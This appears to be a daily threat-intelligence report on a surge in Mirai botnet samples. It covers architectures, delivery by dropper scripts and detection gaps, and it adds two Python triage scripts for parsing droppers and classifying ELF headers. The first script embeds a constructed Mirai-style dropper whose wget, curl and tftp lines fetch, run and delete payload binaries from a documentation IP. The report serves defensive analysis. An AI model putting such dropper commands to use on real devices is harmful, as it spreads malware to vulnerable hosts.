Daily Summary
Mirai activity surged today with 100 new samples, a 75% increase over the 7-day average of 57. This marks the highest single-day count in the past week, driven primarily by ELF binaries targeting IoT architectures.
New Samples Detected
ELF files dominate at 55 samples, with 7 shell scripts, 4 x86 variants, and smaller counts for MIPS, SuperH, ARM6, and x86_64 architectures. Notably, the .mips (big-endian MIPS) and .mpsl (little-endian MIPS) samples (3 each) indicate an ongoing focus on MIPS-based routers and IoT devices, which ship in both byte orders. The single sample with a .i suffix does not match the suffixes used by the leaked Mirai build script (x86, mips, mpsl, arm, arm5, arm6, arm7, ppc, m68k, sh4, spc) and is most likely the output of a non-standard build script or naming convention; its actual target architecture should be confirmed from the ELF header rather than from the file name.
Distribution Methods
Delivery is primarily through download-and-execute scripts (.sh files) that fetch the ELF payloads for every supported architecture in turn and run each one until one matches the host. In the classic Mirai chain the bot's scanner first brute-forces Telnet (or, in some forks, SSH) logins with default credentials, and the loader then pushes this script to the compromised device; the script itself does not scan. The presence of .x86, .x86_64, and .arm6 samples suggests operators are targeting a wider range of hosts than embedded routers, potentially including x86 servers and desktop systems.
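The following Python triage script is an added example, not part of the original report or any Mirai source: it parses a constructed Mirai-style dropper (wget/curl/tftp fetches, documentation IP 198.51.100.7) and summarises which hosts serve payloads, which architecture suffix each payload carries, which suffixes are unrecognised (such as the .i sample above), and whether the script deletes the binaries after launch. The suffix list mirrors the leaked Mirai build script; the x86_64 and i586/i686 entries and the busybox-style "tftp -g -r file host" form are assumptions.

```python
import re
from urllib.parse import urlparse

# Suffixes from the leaked Mirai build script. The x86_64 and i586/i686
# entries appear in later forks and are an assumption here.
MIRAI_ARCH_SUFFIXES = {
    "x86", "x86_64", "i586", "i686", "mips", "mpsl", "arm", "arm5", "arm6",
    "arm7", "ppc", "m68k", "sh4", "spc",
}

# One fetch command: from the tool name up to the next command separator.
FETCH_RE = re.compile(r"\b(wget|curl|tftp)\b([^;&|\n]*)")
URL_RE = re.compile(r"https?://[^\s;'\"]+")

# Constructed sample dropper in the classic Mirai style (not a real capture).
SAMPLE_DROPPER = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.51.100.7/bins/mirai.x86 -O x86; chmod +x x86; ./x86 telnet; rm -rf x86
wget http://198.51.100.7/bins/mirai.mips -O mips; chmod +x mips; ./mips telnet; rm -rf mips
wget http://198.51.100.7/bins/mirai.mpsl -O mpsl; chmod +x mpsl; ./mpsl telnet; rm -rf mpsl
wget http://198.51.100.7/bins/mirai.sh4 -O sh4; chmod +x sh4; ./sh4 telnet; rm -rf sh4
curl -s http://198.51.100.7/bins/mirai.arm6 -o arm6; chmod +x arm6; ./arm6 telnet; rm -rf arm6
tftp -g -r mirai.i 198.51.100.7; chmod +x mirai.i; ./mirai.i telnet; rm -rf mirai.i
"""


def fetch_targets(script: str):
    """Yield (url, remote_filename) for every wget/curl/tftp invocation."""
    for m in FETCH_RE.finditer(script):
        tool, args = m.group(1), m.group(2)
        if tool == "tftp":
            # Assumed busybox form: tftp -g -r <remote file> <host>
            toks = args.split()
            if "-r" in toks and toks.index("-r") + 1 < len(toks):
                fname = toks[toks.index("-r") + 1]
                host = next((t for t in toks if not t.startswith("-") and t != fname), "?")
                yield f"tftp://{host}/{fname}", fname
            continue
        for url in URL_RE.findall(args):
            yield url, urlparse(url).path.rsplit("/", 1)[-1]


def parse_dropper(script: str) -> dict:
    """Summarise a Mirai-style dropper: hosts, payloads per architecture, cleanup."""
    by_arch, hosts, unknown = {}, set(), set()
    for url, fname in fetch_targets(script):
        hosts.add(urlparse(url).netloc)
        suffix = fname.rsplit(".", 1)[-1] if "." in fname else ""
        if suffix in MIRAI_ARCH_SUFFIXES:
            by_arch.setdefault(suffix, []).append(url)
        else:
            # Unrecognised suffix: flag it for manual ELF-header triage.
            by_arch.setdefault("unknown", []).append(url)
            unknown.add(suffix or fname)
    return {
        "hosts": sorted(hosts),
        "by_arch": by_arch,
        "unknown_suffixes": sorted(unknown),
        "self_delete": bool(re.search(r"\brm\s+-rf?\b", script)),
    }


if __name__ == "__main__":
    summary = parse_dropper(SAMPLE_DROPPER)
    print("payload hosts:", summary["hosts"])
    for arch, urls in sorted(summary["by_arch"].items()):
        print(f"  {arch:8s} {len(urls)} payload(s)")
    print("unrecognised suffixes:", summary["unknown_suffixes"])
    print("self-deleting:", summary["self_delete"])
```

The hosts list is the block-list material for egress filtering, the per-architecture breakdown tells you which binaries to pull for detection testing, and the unknown bucket is exactly where an odd suffix like .i lands.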
Detection Rate
Current AV coverage for these variants is expected to be moderate. While Mirai signatures are well known, an influx of 100 new samples, particularly for less commonly analysed targets such as SuperH (.sh4) and the unidentified .i build, may evade detection on platforms for which fewer signatures exist. Rules that key on the x86 build alone will miss the MIPS and ARM binaries that make up most real infections, so SOC teams should verify that endpoint and network detection rules cover the full spectrum of architectural variants, including both MIPS byte orders.
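One way to do that verification, as an added example that is not from the original report: classify each sample by its ELF header (EI_CLASS, EI_DATA and e_machine) rather than by its file name, map the result to the Mirai build-script suffix, and report which observed samples fall outside the suffixes your rules are known to cover. The sample set below is constructed from minimal synthetic ELF headers, not real binaries, and the suffix mapping (for example SuperH to sh4, SPARC to spc) follows the Mirai naming convention.

```python
import struct

# e_machine values from the ELF specification.
EM_NAMES = {2: "SPARC", 3: "x86", 4: "m68k", 8: "MIPS", 20: "PowerPC",
            40: "ARM", 42: "SuperH", 62: "x86_64"}


def identify_elf(data: bytes):
    """Return (bits, endianness, machine) from an ELF header, or None if not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    bits = {1: 32, 2: 64}.get(data[4])          # EI_CLASS
    endian = {1: "little", 2: "big"}.get(data[5])  # EI_DATA
    if bits is None or endian is None:
        return None
    fmt = "<H" if endian == "little" else ">H"
    (e_machine,) = struct.unpack_from(fmt, data, 18)  # e_machine follows e_type
    return bits, endian, EM_NAMES.get(e_machine, f"EM_{e_machine}")


def mirai_suffix(info) -> str:
    """Map header facts to the Mirai build-script suffix convention."""
    bits, endian, machine = info
    if machine == "MIPS":
        # Same e_machine for both byte orders; the suffix encodes endianness.
        return "mpsl" if endian == "little" else "mips"
    if machine == "ARM":
        # arm5/arm6/arm7 cannot be told apart from e_machine alone; it needs
        # e_flags or build attributes, so this collapses them to "arm".
        return "arm"
    return {"x86": "x86", "x86_64": "x86_64", "SuperH": "sh4", "PowerPC": "ppc",
            "m68k": "m68k", "SPARC": "spc"}.get(machine, "unknown")


def coverage_gaps(samples: dict, covered: set) -> dict:
    """samples: {name: bytes}; covered: suffixes your rules handle.
    Returns {name: suffix} for every sample outside the covered set."""
    gaps = {}
    for name, blob in samples.items():
        info = identify_elf(blob)
        suffix = mirai_suffix(info) if info else "not-elf"
        if suffix not in covered:
            gaps[name] = suffix
    return gaps


def fake_elf_header(bits: int, endian: str, e_machine: int) -> bytes:
    """Constructed minimal ELF header for testing only (not a real sample)."""
    ident = b"\x7fELF" + bytes([1 if bits == 32 else 2,
                                1 if endian == "little" else 2, 1]) + bytes(9)
    fmt = "<HH" if endian == "little" else ">HH"
    hdr = ident + struct.pack(fmt, 2, e_machine)  # e_type=ET_EXEC, e_machine
    return hdr.ljust(64 if bits == 64 else 52, b"\x00")


# Constructed sample set mirroring the mix described in the report.
SAMPLES = {
    "mirai.x86": fake_elf_header(32, "little", 3),
    "mirai.mips": fake_elf_header(32, "big", 8),
    "mirai.mpsl": fake_elf_header(32, "little", 8),
    "mirai.sh4": fake_elf_header(32, "little", 42),
    "mirai.arm6": fake_elf_header(32, "little", 40),
    "mirai.x86_64": fake_elf_header(64, "little", 62),
    "mirai.sh": b"#!/bin/sh\nwget http://198.51.100.7/bins/mirai.x86\n",
}

# Hypothetical rule coverage for a team that has only tested x86 and MIPS.
COVERED = {"x86", "x86_64", "mips", "mpsl"}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:14s} {identify_elf(blob)}")
    print("uncovered:", coverage_gaps(SAMPLES, COVERED))
```

Replace SAMPLES with the real files read from disk and COVERED with the suffixes your rules were actually tested against; anything left in the gap list is a variant your endpoint coverage has not been proven on.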
C2 Infrastructure
No new C2 servers were observed today, indicating operators are reusing existing infrastructure. This may suggest a consolidation phase or a delayed deployment of new command channels.
7-Day Trend
Today's 100 samples represent a sharp rise from the week's average of 57, breaking a pattern of moderate activity. If that average includes today, the other six days averaged roughly 50 samples each, so today's count is about double the baseline rather than a continuation of it and signals an accelerated campaign.
Security Analysis
The surge in ELF samples, and in particular the spread of architectures, is consistent with operators cross-compiling one codebase for every supported target and letting the loader script pick whichever binary runs on the victim, rather than with hand-picked targeted distribution. The emphasis on .mpsl and .mips variants suggests operators are focusing on outdated firmware in consumer and small-business networking equipment. Defensive recommendation: immediately block outbound connections from non-essential IoT and embedded devices on TCP ports 23 and 2323 (Telnet), the ports the Mirai scanner targets, and on TCP 22 (SSH) where those devices have no legitimate need for it; egress filtering of this kind stops a compromised device both from scanning for new victims and from fetching the dropper's payload over the same credential-based path.